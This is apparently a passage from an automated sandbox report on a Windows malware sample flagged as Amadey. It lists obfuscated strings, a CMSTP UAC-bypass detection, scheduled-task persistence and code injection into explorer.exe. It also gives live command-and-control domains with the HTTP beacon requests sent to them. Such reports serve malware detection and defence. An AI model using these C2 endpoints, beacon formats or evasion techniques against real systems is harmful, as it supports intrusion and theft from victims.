2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
Source: vkqcbyjdfiw.12.dr	String found in binary or memory: net start termservice
Source: vkqcbyjdfiw.12.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	artvisions-autoinsider.com	European Union		13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
artvisions-autoinsider.com	188.114.97.3	true
artvisions-autoinsider3.com	unknown	unknown
artvisions-autoinsider2.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php	true		unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\cnfpnteryde	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5Z1WFRMTOXRH6X21Z8NU8.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: more.com PID: 7360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: logioptionsplus_updater.exe PID: 7984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: more.com PID: 8152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3492, type: MEMORYSTR

Uses 32bit PE files

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 5Z1WFRMTOXRH6X21Z8NU8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
Source:	Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_0079ED13 FindFirstFileExW,

14_2_0079ED13

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49838 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49838 -> 188.114.97.3:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe

Network Connect: 188.114.97.3 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00770370 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

14_2_00770370

Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider3.com
Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider.com
Source: global traffic	DNS traffic detected: DNS query: artvisions-autoinsider2.com

Source: unknown

Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/5
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php&
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpH
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpQ
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php0
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php?
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpM
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpdu
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider2.com/c
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php(
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.phpP
Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://artvisions-autoinsider3.com/S
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
